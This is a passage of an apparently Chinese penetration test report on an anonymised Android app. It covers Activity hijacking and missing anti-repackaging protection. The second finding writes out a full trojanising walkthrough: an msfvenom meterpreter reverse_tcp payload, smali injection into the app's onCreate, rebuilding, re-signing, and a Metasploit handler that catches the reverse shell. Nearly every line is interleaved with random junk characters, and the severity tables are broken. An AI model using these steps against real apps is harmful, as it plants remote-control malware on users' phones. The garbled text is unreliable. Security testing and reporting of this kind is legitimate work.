# n. }5 i$ o/ E/ @4 T/ j4 C
9 j% F @9 L" d+ l
4 W( Q9 w4 d) @/ v+ ~3 E
/ s, n% _0 U% u
2 J% W- P8 i3 h7 \
) w: W$ M4 E* A1 `
1 o9 W/ T+ r" |+ ] % a0 E: _' ?! h- m* L2 T( K9 `# U2 r9 E
# C% p4 o/ [; @ d% V, s8 h' I
& A7 L6 U$ a6 W$ c/ l6 S
( R" n; _8 y1 Z& ^! s
% s/ N3 O7 f/ b; d
9 X$ q/ J7 ]3 X% \) d 表1-2 测试结果
, c) ?2 b: R' b% u
7 k$ x8 p( Y, Y% u3 `8 }5 x
- Y s _# v' ]" t7 L; N/ O# F
+ n* \) d& Z* l X
* l! n3 Z @/ f9 Z. t* p0 M( e- | E% O
& P( |: Q3 q$ u' p7 [& g+ t8 y2 _
8 z* ?' h3 e) [6 P) J/ V' ]' r
. {& k2 }$ z- r3 ]' x
, r8 S" k5 Q9 S" _# q
C* F H* s$ a. s7 _7 \7 q3 _' X2 X: S( y
2 检测结果
# \9 ]+ }) i1 o, [! V4 M
" |9 }4 K) ?2 Y7 o/ C- h& e
" W" n% c U# `" a
" \- `8 z( m1 L3 e B1 m
, \! ]8 y. I; l" V9 ?9 {. c$ r2 `8 S V; q3 T8 W
2.1 某某某 $ v0 A, `8 ^6 n
& t4 p0 X9 m0 g; k/ [4 e
+ i% M: |1 L0 o) e, F; S
/ n& L5 Q5 Y |$ Z3 H
8 i, G3 F- j1 n0 q# W+ T7 `& T+ z3 o1 \
2.1.1检测目标 & Q2 h& P5 v. |
5 e! p! w$ w$ _- Y0 ^( Y$ a6 e
( W& u4 O2 k: u+ g, {9 a. ]
2 M4 d" Z# [+ P6 }: E0 ^& H- o
9 P* M2 w, y/ h5 m0 X! R2 n1 M; t: j; q! X
目标地址: 某某某某某某APP
% P' K- e8 g. n2 R
( c/ G% X1 p C1 z0 s
5 T& A: }( T& n/ c: `
8 }+ E: }; ~ Z w
% s( _6 |: m- k6 S
3 Q! `2 {+ u! {- j 2.1.2检测结果
! ^% p" h5 J' d1 }- U# o$ g2 s. T( o- f! Z% S9 g! H1 I! C
2 G3 l( k* |) x
4 k$ y6 @+ W( o+ Q3 A4 ]1 l8 u
8 y: T9 Q5 V- Z- }
* f: `& \* ?/ I) q
2.1.2.1 7 W3 Z9 h0 H5 x8 v5 B# |
" _" W6 L1 }& E# X! K S3 v
& h Y) W: }9 d5 a1 Z- H; l0 f9 r
- @" \6 o. j; H& _
1 h7 q5 z7 o! D# a
漏洞链接地址:某某某某某某APP
" j# e0 `1 G V: v" G' `3 J9 O2 c7 r( L, B0 c8 I- u6 z
$ U* d* I9 X- x: y
% i! B: q2 c: H6 K" O, |" u6 l 7 `9 v4 F+ N1 K0 y6 d/ M
- B4 c4 T' f/ s/ a7 W; C5 E7 R 4 z( Y* R* v d# j; E8 x
& h3 _; y. O+ O5 d
0 d1 s3 Z! ?% a2 U
% _; `- S# u% A! \( i, I: w6 Q
1 O7 A2 |# n6 Y: O+ _2 b
& T0 x; [& l' l; G) y+ v- k! T 漏洞分析及取证:
2 o: ~7 g9 R. i ]3 L
8 L- Q0 H) i/ }
8 y2 M; d% h" q) P5 E+ W; ]) o( d$ ^: d9 ~
1 x& ^" u$ _" N! x! X7 ~3 W
. W' |7 v! j, M, ~8 t% k) x 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
/ ~ N- z* P: u- Y# p/ H
$ E8 P t. i5 h$ g
& Z$ [7 R" M V8 }
/ B4 ^/ X* P: u# J+ p- ?1 V
4 [" E: H1 b) O9 @6 t2 @% R5 I& W: t
+ k. `" ^+ g% h4 G 5 ^; |" H* N3 o* u: n0 l, O
/ E m& s) o; E& S/ a7 v
3 w( q% f# h' t2 H/ N
3 V& C6 G, q0 d& L1 F7 i9 M) C " o! {2 a. h& R! Y( [/ k' p
/ i. x; }; v. C9 V+ _; n 8 g, \) h) N5 U' U3 a
7 F$ l0 v1 b4 v1 m- @5 Q6 y: [
& R. Y# e% y( A8 f2 H
5 I% T, G1 W$ Y+ h% U2 _4 S$ S" i3 M
; y# w$ j3 p# b6 K: x* k, T4 P4 ]2 c% k8 W% Z" n
, \4 B1 H7 t0 W9 ^. w0 M+ H
( m2 X/ z1 x$ d# }0 S- o
& t/ t$ U, J! i K+ `" y g8 w* p9 z q. i# J
7 a4 M- U2 w% M% w* P7 }6 O( F3 G# N0 G" z
% J1 W# |) c1 I
: b; T! n! O7 v1 w2 {3 W8 I
7 I3 }# M" o0 r7 v/ h# x+ H; f
. [1 H- ?& h# Z, a $ ^0 Z) t! {5 E! q% a! d
& Z; O. o& p6 q9 o9 j; ?% {7 v) h * i$ [! k% a: B, R% V
8 e# \$ I5 I7 R7 @/ O7 D* g" ~ x
% q. O8 u: K4 L. g) b0 M
! F) ?' ~6 |" O5 x9 J
& a. _3 L5 Z! j' t8 B
" A9 ^- W3 E# X2 ^+ ~4 U4 T
漏洞危害:高 & v* n; X* n, p
8 N* U' L: H6 p- u7 r8 Z. H
8 w; o1 F. i& |0 |3 M+ A) X- M; Q) D4 @5 X! v( Z+ a7 z
# z: Y! m4 ]$ @% i& r
" Q* Y# @: r+ Q- B" P
7 G5 Z) u' V" O4 W0 W7 V8 N# f/ q6 r6 o+ \+ m3 d- k1 K8 M
; r( S2 Y+ N3 O* [6 k1 Y+ P
* }7 |! `+ V9 X; M5 Q3 B( T) R 1 {# k2 a* {" Q, d* [
% f( L9 o* s' v
: w3 t0 S# f% |) A* {! T" x5 s9 ~
2 L& m# `/ h% a! K n
6 `; m2 P" z, ?. `; h( `& Z- n5 p# }0 g7 t8 C( _
严重程度 8 g8 Y r+ v! b1 u: R+ u
+ R% M, W: x6 P/ d
+ H2 ]; V w# o) R) r* j6 P
+ W- n! c) P8 e3 R& Q+ K, `5 S |
5 E. r) U0 k! b1 d3 q% o$ C
* w' U* j( S* x4 H
3 _- O' p; t6 l+ c
5 I1 T8 I2 S) G) z; Q . L3 j) I% q5 p W: b; F4 C
' m# l4 a: ^: K6 }/ k8 g( M 高
; [7 m, y6 Y& K# m( t6 l$ _+ b$ A9 F/ x
8 ~$ i8 |5 C g6 _) k+ V; ^# D) F" O3 k8 \$ u. [7 L
| / y$ E5 k& y3 b' y7 {
2 z3 N G! Q B" u$ [& L* f
& V7 [" V; B; I" s9 g$ G; Z7 e
! ?% f6 r" |! f5 s- u+ J
) G( B+ ?% X- u9 x
: `3 A2 t0 J$ a9 I ■ & P" m# @0 D/ o D( c+ {# L( E9 J3 l
2 f3 D) G* Z* p6 q' I
+ m% g0 O; _2 L+ e+ _- V/ A; \* @
3 P* R& _! \0 w6 u# C | $ X+ G5 z) C8 _" z1 P2 H. E6 k+ t* C
5 E4 k1 Y. L# L3 A2 o, r 2 F; X; g/ @- S4 C7 s( P# |
. Z: J) r) g: F ' Y: I. b. T- P2 V
0 v1 e% C& D3 o+ O
中 ! @ i4 w( E0 z4 p2 x4 J& Q: _* l' o
B% g3 C2 e. o
( W* H" m; L, p& k0 w. U1 [- a+ d/ r- w" d0 }
|
* f3 o$ _' f R& ?7 }# g: l% u( e3 q5 r: _% K
; m# L2 z: d7 Y2 L" ]0 `& i
' y9 c0 t( \+ _) f7 x " m- ^# {! Q! @# }% s1 L9 L b
) t' p& X7 w; E, p1 x & B9 R- S3 B r4 |, _% }
Q2 d4 u# y% ]: D! x3 a
% {- i9 ?' p P7 p/ V+ s) L
' f- G2 l+ M" F4 _& t, C: S; z4 c6 ~ | . E9 D: U% e/ Q
+ v+ H$ _+ k. Z, j! ]
. P% ^% ]6 y: \, }' @( O$ C
1 N6 y# d7 L2 _6 B3 B# ` ; X9 s' U; ~- b$ P+ c X
& u: G3 w6 i9 f9 z" C9 O5 m+ T
低 - ~$ w9 Q3 Z# C8 y
. g& c! F* V4 Y: s* X( T* r
* X# O6 k R' A6 P( l; X H9 d- v1 G6 q0 U
|
( F f+ J2 T2 g* P# X& J9 H
% s5 d& C- Q4 U# `7 K8 ~
4 I8 t. K: ^! A0 B; F8 P: U! z( L& @+ S$ O5 f
: f" S* `4 r0 c- G5 B
* x' L; ]2 u. z' |! U* h & K4 T0 S5 p0 a! p$ @) Z
9 I) e; g+ a' B( q" |4 R7 T 5 p& v; R' \7 I7 i& s; R1 j& R
* Y8 g5 @9 J" W8 N |
; G( ~1 J' @, y5 ]* D, t/ n
# m P x8 c) n: H$ b; @) n1 S, \
& D1 Q, ^: d U' g, l
6 [% G, E. ~1 H0 B/ y
( S4 H# ]3 W, z* ~5 Q- \ I' a# v4 N2 q4 P' c* x4 T; L
& k$ E/ R# Y V) Q
# f- n" E/ M+ a0 {* a( }% f3 ^# x
: O; Q# Z2 f8 ^, X0 T; _9 O4 S; b5 ` [# I; m
5 N0 j" p5 F) k. e3 |: D7 w4 V- g
% E V2 V5 w: L$ P$ f, L
+ L+ u+ X% u: D! g2 ]7 C
. q( g( W. f+ q7 v' u) K
+ L: ]3 Z* D1 J2 `0 s
1 ]. s1 D9 x4 p2 ^6 j
7 Y0 y# U1 r* l- ?
" p3 |, g; r) s# P- o
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 0 Q' [' T4 F' e4 h Z
~4 R. Z/ G' ~) C H
8 z; v! w% o/ U1 c1 z
7 n* ~4 E6 T* N
5 @9 }- q J3 ?/ G9 ~0 {% \' I& Z; M2 S$ B9 R
4 B9 b/ i) A7 p6 d* p& W0 i
* D: f( R ~' v- i& y- U9 K: B: k
5 J9 S! C% T# v/ |, C& y; I3 Q% `, d: a- F) e
+ a" X1 T2 n5 `8 i8 w* r* {) R1 }
( {! h+ W1 M- L0 d1 }9 d
* G3 X% b" U' {) s, |3 `; |7 U- v3 ^& o* l8 n c' E* e
* U' k8 s; Y$ C- L/ w* U. U6 M/ I; N: D7 S# [# t0 z
& r) R0 @7 J: d; `
0 {9 ~3 ~; G' W5 T- z 2.1.2.2 5 A0 ]' s8 c( v c5 f; Q
* _: _6 a5 f8 T4 Y# x' A( {) c
4 V" D8 Z( S: I0 Z, i1 y% f0 ~% {: J1 K, C+ P. X- X
\2 V) I! w- C) F/ k4 `/ c
0 a& q6 I3 x5 d- i 漏洞链接地址:某某某某某某APP $ {3 Y* c/ T. M# r+ S, e4 r% U
% T6 t; K4 f2 l- }$ M! w$ z
) ~: v! T$ }- X9 w" @2 t9 U+ L V9 A q2 G8 v( C" Z( i; l% {
1 K# O8 [6 h4 m3 c z# M
& s! r3 ~1 s9 d8 o! r3 P1 H* V! ~
漏洞分析及取证:
7 s( T- C& Y, F P. m: D4 X- W
# x$ a9 x) E3 U) G. H
. G- ^8 Q9 V4 ]7 a) x0 D0 |
- ], S5 ?- |2 c# Q5 x. G - G9 t( A' T! T; _! R
3 w* E- A0 H2 a2 q
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
8 H6 s! |% A% E5 V" s
; X) g' k3 D2 }* ?( {' a8 K! y
8 ^5 V. m, l0 I
6 A, D) t% f2 z7 x/ p
z6 F/ I* c# i' o7 I+ K0 D
& ^1 v) h9 b+ e2 T( t0 b 用Metasploit 生成木马 apk
( J! \- W% \5 O/ L# ]- F6 q! M/ e$ F6 Y2 Y7 l
* [& M! T; }' T+ v8 l( L* Y
3 A& [: T+ h2 c
, G6 `2 e+ l! S. t+ d; ]9 o/ x9 K: `5 }6 |. v/ k5 U% I: S
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
# a# ?7 V4 f" b( z# c* ~" h% u# Y5 V q- w
# ^% ^1 N6 x7 y0 N
$ b; \/ [% o6 A) V
; P) Z j \! h0 i- X% V) T" h. S
! a/ w) A# |' v; v+ }5 `6 { 反编译目标apk和木马apk
% k( v5 x9 V, g8 ]" ^9 j: S+ n( I. U+ n) g
! ^. n0 r S) n& W: R& F
: G1 _4 C0 [* R' \5 c! j 6 [; y5 L2 ~! [
2 P% a# k" d- E
apktool d target.apk
: T. d7 n/ W! S J1 Q J8 F$ }0 d0 k) y+ v- K
apktool d cockhorse.apk
- p" o, b$ I1 A; c) N3 R3 b4 B+ y5 b5 Y! `; b2 \! T6 L9 G
; }# L8 i" T& ^- x* {+ y
7 Q# e; n" l# `8 ]0 \' E8 q' X 5 K" Z6 K: \ G# p
; o1 b5 ?; u& ]" {- O7 J 木马 apk 注入目标 apk
4 K9 D3 S. T* a5 |! p) {! t. c( y8 [6 J
% r: E$ V3 ^4 R2 @, `
8 V' g( L8 T) |* c/ J, u! i3 U
1 }: w! U; }3 {1 U3 B) z8 U
# H% ~$ `% l. m& @ 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
/ J& v5 v1 J" Z0 z$ R0 a |) U& |4 X
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V - Y1 x: K, B) ~) b0 K
! K2 z0 Q- r* X% w0 R* Z# T, K
9 ?' ^: Y) G: E" P6 s1 b
7 {8 ] I [( T5 r2 K
$ ?/ F+ u/ k* I! v9 R
5 u/ t- D0 R+ o4 r 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
) J @1 @. v& {- ~" X( z
) s3 Y, u% ^. z& k0 c. h0 Y$ [
/ l* g7 {6 N0 i) v7 T
4 g1 H B' j6 B, t0 z* P
& z, G4 @7 W) o! B: [) L7 @
i, O. `5 w' F 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
1 h. i; N# x4 O+ R% V' x; O! t! _' ]. b I, Z4 y* H
, l1 B, [" ^* Q) ~3 C5 F4 M- C& n, }+ z
6 r. J9 u- T v' n* \. |5 S: [: w7 b( O( K! k0 v
回编译生成最终 apk , b% z- o x" g
% z7 h0 Z2 n; _# D. U/ X& l) b: q
# w, W4 B; z! t: u% I! ?2 Z
$ x, D2 U, F7 k. g. o$ {8 | : i4 `+ A$ W- ?
& D2 K4 q6 u; L' R4 \
重新打包 0 [2 G$ G9 G! C" b
) q2 g) p: @& O/ _! h
- v: i/ w( j0 n4 X% Y/ z+ v- T' K* }! s7 N
, W3 z5 t- u' `- N" R5 ]3 y, R. i" h! G' l V
apktool b -o repackage.apk target_app_floder
" Y% s _1 M9 V' d- I" k6 X6 r* u
/ a. z/ }* N5 Y, {: H) q9 K
! P# ^( Q2 G7 A, Z / c2 p9 @' U: o( @, k+ `: p1 P
3 ?/ `# U, L+ [( ~4 @* y0 [3 V( d+ D 创建签名文件,有的话可忽略此步骤 7 k) g, r& ?3 L( u$ Y
# B* H4 {; @% z) B7 z5 i
, w2 {! ^3 V+ D! |* E
; N' ^# a5 Z1 g6 [6 h- \! u& s & O% a9 i- ~: m8 H4 W9 r O
' E A8 N; M! I9 \3 R
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
' H- t, i$ c" Z3 a' q3 Z' f2 a
( R% v9 \9 o- K) {/ A- o
6 \& _8 U1 i0 m2 [* f
3 `- y( l) z. C( Y; C 5 I: o2 Z0 W8 a9 i1 W$ g
! P( O; j" X5 s/ E3 K( Z7 O5 |& E e 签名,以下任选其一 5 t5 m, y1 C4 ]
" k' h" B6 x1 g
# i, s7 J$ x/ i5 T
. p$ Y) s1 ^& q4 C+ h, P- a$ D$ A 7 P. I7 a: O3 y0 D6 [$ I* J
( }$ i# U7 |0 }* @ jarsigner 方式
+ k6 s) P2 ]+ X) ]. ~( c8 v$ C1 B& T5 I1 h$ B) `" c9 [# a8 f7 Q
% C4 a6 B! K' j w4 {' }/ j
. d+ |( N" E% I, O5 U
' a1 e; U& w3 N1 I7 z( @9 f7 V* Q. a2 ^5 B, N/ _8 }6 P
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 4 A. X- [, U& c# a4 n& i2 K
' H* x/ H* c' r4 f- E# E6 p: |) R
1 i3 Y4 y4 W( H7 ], a0 I, g7 W
) [, X5 S$ z( } , J5 U r# ?' ~
' Z/ }0 f' _* c& M, F/ f
apksigner 方式
1 ?5 N/ r' J7 A) G
0 @. p& {2 O. B X/ y
0 x- O8 L8 O9 \! U2 C) E% j8 n/ g; N! b3 s7 Z* h* Y
" G3 x& o! A/ W: r3 Q, g6 I* O2 C. a2 l+ ~8 k6 x
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
! }1 I) G9 n* T! {* i4 h$ v( H. s, G& F' q0 V. C2 z( k
- G0 G8 e! M# j* i R- S
: P6 N* U* b0 u$ H0 R
! u$ E2 \; s1 [. @% z x, b2 ?
h3 q/ B2 N: R7 W 如需要禁用 v2签名 添加选项--v2-signing-enabled false
1 B) e! r b( ^1 p6 L! ?" q" U5 A) j- E' ]
4 d6 o# M n/ R; H' S, C3 N
- z D8 z. D. A- }
4 B! f; n% x% D. H- `/ C' j6 M
- C" K+ I; I" d4 z" Z
& F$ _/ i; B# Z/ s8 Y. S- D 验证,以下任选其一 ! u8 X& Y) M2 h8 H' e$ u' `7 }
) ]$ Y& G' |- I1 f1 o# E! m
# z. v# Z: p- @" b4 ~
" g9 P/ z+ @' E$ g9 @& Q; ^3 I
1 d0 g8 B2 u& L- j o! h3 Q% n
2 y+ o2 H9 E5 ]& }. X" Z
jarsigner方式
5 ~0 [: t. ^( s
9 I; k9 Y7 \) i( b9 Z
1 E; ^- W; W, y1 Z
- a5 L; W8 G: j3 @% X2 z" `, s4 S
# ^$ k5 j! H: u; E3 d5 N n5 i# y) }7 A( ~9 ~- u0 g3 m! X
jarsigner -verify repackaged.apk
# ]5 w& ?4 `- }% `* X/ F( _
- [: u( D0 @ ~+ R% d1 M3 @
" z9 C+ O% h9 L' L: X$ z- v0 A4 r5 O5 X8 P
; h- \3 j0 ^( g
2 P- _5 b& i) q, r! s2 n5 W4 w
apksigner 方式 6 v& @; F, }& z. [1 n1 l
* r6 X' h9 F* f( V! F7 u
3 E0 X1 n) u: P. q; e: V& I& B/ z( E3 t+ F- ^# s
* C5 H4 r# ~# L2 ]3 P% P: |: q0 k7 I3 e- q3 T2 G
apksigner verify -v --print-certs repackaged.apk @) t2 H) d1 J/ g, h% ]
4 Y) Y' Y, E3 `$ R
" r! R e. X% ^: ?0 x0 H/ v' F
3 {* g- }) ?+ p- Y" J
& r* W9 w: W- p3 g8 x3 b( d/ c" |/ k$ w h
keytool方式 8 L# X- P, D- z, Z
0 `7 }! C; \! Y! j; s
- n& w. y% v/ G0 G1 ~$ Q$ o
6 ?- L+ {2 Z5 p# }6 k0 d
1 V3 Z8 W* G h% k5 B. G
+ e {! s4 d2 Z3 g4 |
keytool -printcert -jarfile repackaged.apk 1 N5 z$ n( o4 ]+ B; g1 a
2 w7 M: F& Z. I% _8 N) e/ a
: V4 O A* ]* n3 D2 X4 ~$ @, n0 U7 s: u4 s' I: u, g/ a( p
; A+ C) W) a! G+ N: l, E9 V3 ?4 R2 o$ G. ~& h9 {
对齐
1 O9 y) {5 [5 D# P; B$ z3 ~, D$ C7 Z4 x2 J+ {
$ p' H$ u. g* N* o
% Q! v& K) p9 q5 q( D* F/ e" R
9 y' N* h P6 V
1 o2 S9 ^4 a- ]4 c C; B 字节对齐优化
9 w0 f& U4 w# e9 P
" Q3 d/ x# |' ^+ A9 J8 {1 {- _; X
9 Q. V' [9 w% z' e( q6 _- I
! G; z0 {5 U$ a" u4 C 6 ~* m1 t' {$ z2 U. ?9 F
. ]% r/ ?0 L& Q: Q8 j- R
zipalign -v 4 repackaged.apk final.apk
Z" R r. |9 y8 I4 t$ _6 S3 C6 Q& ~' G
: i2 F# c+ s3 Z8 t; B' H$ t; y( u y4 c0 x/ j" a0 w7 ~: M
) t) d' i" g% a2 O- H% }4 i% l) X3 \9 Y4 [& `1 R
检查是否对齐
: F, P5 j. L/ x% \4 L1 \7 E, f4 H( ]- D5 a+ |
7 O8 M( b* R' b3 y9 o7 V0 F/ j3 g; `- u7 j$ D7 K6 G# I4 X4 n
6 a" }' g, N) }: t
1 n6 i, M- o4 P/ W6 y* ^ zipalign -c -v 4 final.apk
, Y/ X A4 V, ~0 j( V8 z& Y$ I3 j
: v$ G: }4 L9 t" ^2 z, ~
2 h5 O5 B) s( {" f, J+ T7 U% B% |; f- \
( K3 E3 Y8 I, f. l* E: ?
+ Q7 A! o/ [: \. K/ y 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
# l6 I3 w8 O9 C5 R* N* X3 S; Q( ]
" g6 x+ _1 i: c# n: | c
4 R6 q& }+ [" Z/ G
& [# S: m* K V/ a- z7 P
6 n& Y2 A! D& _! j' {
7 L- B4 G' K3 l1 |( r/ W& i 启动Metasploit控制台,配置参数等待上线 # I9 ~6 N# E4 y# R0 h
1 n% z6 I! t, x. I q2 N
6 h$ n+ u: G3 z
3 p, K( _9 Z6 v8 e3 S' U1 C
& ~2 W/ b. v( g7 O( r( ^% N" d. p% X# T; k9 H+ y" \& V% K! ~2 s5 ]
在终端依次输入如下命令 5 e, Z) l5 @4 N! n
% J. x6 V, T& u+ q/ T
! z6 B8 X2 k2 |; f$ |4 Y
$ k) V$ W# m; K+ s; z6 J/ {5 U
/ J' l6 h- B3 o7 A; Z$ D7 p) \7 l& E2 ]5 u: b. s
msfconsole + b4 e2 M6 w% b8 [8 |7 R& c
9 {1 B2 }9 h7 C1 o% q+ A7 B6 b
9 s+ s3 G7 H) t& G( F6 s1 ?5 k" V* F- ?( D
5 b+ }2 d- c- ]; Z1 i) B7 `2 q' |% {5 u9 p
use exploit/multi/handler
[3 ^. M' Y7 D- |7 f# X- q2 {$ w8 |% e
. Y! U3 M$ I) Z) N
9 b$ e4 O8 j' } ! h5 q6 K* a9 s- r6 L
( T& o9 z3 A) ~ set PAYLOAD android/meterpreter/reverse_tcp
# }6 C6 j/ ?. r( ?
+ G. f0 e/ ~& ~+ b) g9 r) K; S
4 s5 I7 @2 }6 P& `3 d9 T3 ]; e, L
& y2 h H4 _5 k, s a+ H% `
% u9 `9 t0 I' z. e) y, B" P
" J! d% K* C: k set LHOST 192.xxx.xx.xx
e; `, k& g H& k7 M8 f! v
6 j# m% m3 e4 d
6 ?, k3 u, b$ ~+ y/ x* e% j
- S! A( U4 D! B) z2 W ' w0 x! k0 P( g* ~! W
' _2 ]! I7 {* P" j set LPORT 4444 : Z7 v( W; U( G+ H4 b
# f2 m: ]! J- Q" q8 O4 N
( g3 ], E3 Q4 H& ~, g- `3 {+ d
; i- z. n8 U1 E' @
3 p7 P; f: t3 `" N5 O* w9 Z
6 E- `3 I2 V4 K% g7 j exploit
6 c! c4 [. c7 ?" |0 \$ n, H
0 g. E; O% t: x, v6 A% G! v
$ D! W6 r8 c% \7 J
2 Q' W; R, k! v0 A! L9 G
# k" ~$ d4 H0 F& a
4 n' M5 o# l: c 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 7 F8 c. A8 b4 |3 A$ @( h0 {5 p
9 y. K- v5 R/ l
9 z6 R3 k) |: h5 `% {
- @) S5 J0 M- V0 b: N8 R
! J6 q% x T' E/ `
8 A4 j3 M9 G8 {. k 漏洞危害:中 1 L5 i+ e, Z6 g( E4 j% e& V1 S" y
! C7 }% e! H$ j2 X/ V
" \* a. o$ s R3 t& e. n, m
4 \6 a5 T* t2 o
! A+ U5 R9 G6 y8 c! b5 K1 X: I+ Z
) I Z2 D( }( v/ k. f
- k; d3 ]( v2 B1 ~2 e1 y& x6 w& D7 B0 C5 x
4 v8 {6 a) q3 e, _* L
2 c: A8 F3 B4 G& O& c4 J
M5 Q) Z8 j' }* _ c
9 V5 o h2 @9 ]7 o! N
7 h. J8 Z1 D. c. p+ [$ q% T# n Z/ W
2 g# a, s% i v+ Y3 r 5 M$ D" m8 y v# d9 l; U
% Y! l4 G1 l4 a: x% M. {/ _
$ C9 M& j" h# G& {
: C% `0 }3 \& L: Q7 _- A
严重程度 " }+ T& `+ o9 q( H
+ y' s( C. T7 @+ a
; I6 L" N U1 E% i/ z T, j4 r6 G6 T) A
|
# {! W1 O' ~- U; {& M5 c. e' E. Y" s; w8 D5 y
4 K* Q- ^5 |0 F6 v& S9 t- c2 v
V$ R! O) v* w- R
3 ?/ c% p2 {% x8 F+ w0 \/ i9 K/ H: `+ F! _
高 D! M7 `8 f) m( a
* t3 [, `. g T" k5 _/ z, Q' h 6 K. t6 H! \! g2 V3 T' @
0 Q C, D9 g. J9 g) ^5 j
| 0 z6 [8 R6 i1 l2 b! x3 l2 k+ p
$ x0 y+ O; W7 n# a
2 G4 @+ a2 z- b9 ?7 A
5 I/ @) z9 c9 D- O 0 m. ^2 f! B# X0 m
( X$ {# m6 D- F3 D6 G ■
: V+ p, V: L' d. u
0 z. v0 I6 y j( } & V1 N, U7 f$ t8 d+ [& m+ }
. h' ?4 J, d: H- J1 O
| ( R% `; S% ]$ W! r+ N+ V Z* [
+ H1 l# B7 x2 L
) d6 p8 V# }" c1 i0 K L. Z3 K ?( T A( f' K
4 W- l0 H" Q' U9 H5 C2 ^
+ d8 f3 f: \7 h% \6 s
中
5 d7 a% P I9 c) v0 }4 G5 U
8 E5 \/ n8 a) l
3 v5 W/ ?. x" c F* Q9 p0 p8 T$ E" g7 v+ u
| . Z+ J0 d+ f( s; K- a$ N5 ^1 r
1 m* @* m& @; G2 k: Q, D( b
3 R: @$ l8 _" T" i
5 n9 J# c e& { / b! A# I0 l: s* M: o
% [! b# _; Q5 d9 C ' J+ U3 M1 o$ L- f( P
& O/ f( p2 l: Y1 t- o* N
! _) F( W# k0 ]9 N( g
* o# Y% \$ x+ w8 j9 r* R
7 K! m" _) A4 ~# e& ?3 J2 [7 B- Q ?9 E6 T" j3 ]' m5 }6 V
| % c1 m. ?$ d3 n; V& C" r( J( R+ m
! e- r$ w( U$ U7 C7 t4 N1 U8 O 8 g5 D# O" y. ?: q& u$ Y" w7 F
% H3 n0 s# f& Y * Z& C8 Q, v5 B% X& R& L
( D" h7 r' W0 ]8 |& R( B" Q: z# |
低
" C3 E/ E' u& A l
5 L# L) \$ U1 `9 L( ]
8 y! @/ W, `% M$ ^* Y- t- @' K
. p7 R, o, e8 g | 2 G% e+ g3 _% V& g, T
9 H. b: M$ ~% [1 h0 J2 v1 y 5 f6 }( h# `1 ]+ |# K) x
$ y1 s. `: ^% {8 q2 r # s; G* ?* N' x/ M' i
7 h. A0 Q: n' }+ E: G4 K
( `) Y# h6 |' V4 i. Q6 N3 b* e3 A1 d3 F7 G6 v
. p1 \* H+ h) ]6 A6 x
" V9 `0 K* r; m' S3 m, G: G , B1 P# K: H( j& @& i, d
. n( V! X- |8 R! | | 3 a5 e$ k- i+ G3 A/ b H' t* ?( t3 A+ x
% U, \( N2 F2 `7 m
4 C/ m4 ^7 H5 \7 r! w0 H
. X+ s# _2 R3 K, O1 p- v
" o3 Z# u: X/ W+ S9 U$ x
( M% ?: T1 J) o* ~
& p$ y% h/ Q: } E# B3 ~! z
4 A( H3 j; Z$ n' [- C' S
' ]# x2 \) F/ g+ p, g
; c6 g% Q! Y" T( ]2 d2 ` * D# ]% S" g7 n
1 ?! W) M. z+ j+ T+ V3 Q! s) @ % x' {+ f1 } X$ ]# H% \4 u7 p
, h k. |* ^: h
: N. a* ^2 ?4 Q, h% D$ g6 }% D
n/ c$ o3 P" W/ V; o5 T) o ( A2 g3 }- f: S4 a
- |7 [7 ?; S2 S3 s% g5 A- M, K 修复方法:
& }7 n) F6 Q' ]9 F: _
* v/ ^4 T: \, V( B( E4 U
$ f1 `6 ~/ U* s/ S4 ~) c5 y' b7 h
4 d! L1 u% b: }, \4 L
' K( @0 k* J, n, q
* w4 g" o5 u. |+ J0 J: [ 1.在 APP 启动时应做签名校验防止二次打包。
" O7 l; ?# q) H: K O! J
[2 x3 {1 A r6 i9 b+ a6 F
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
' l- o* ?6 V+ n- k' l5 T0 g% u/ r0 `( }* M0 A
, S- y: A, r' C+ d
& R. j/ U `/ u/ X! U% a# o; R + ~- X6 c9 j0 I! U7 j1 @
) u L9 L y+ u0 h
& w0 G" x4 f3 y" d' A8 t( G7 ~8 H& N& C6 p3 J
) [; Z/ [, A& E8 X! f; }
1 G C" Q1 j/ t1 l" Q- r4 U9 ^
& e# F* |) @% Q/ Z0 P
* m2 q* z& F/ V4 G7 D2 f) ^' j / V" A: M+ r4 ], o+ Q5 o
- ?. V2 Y- i' n8 G" p
/ Q2 t# J& d1 k0 H' ]+ L0 V( T
" l! Y u4 v& o+ O4 w
4 [) W# ~' M) V$ c; U4 ^; U; g& L& h5 n. i! t4 l6 i( T
$ X J3 O1 Y9 `5 q8 Z; x& j8 u( s8 \
- s' X2 K9 D) _/ T6 C- @" x6 d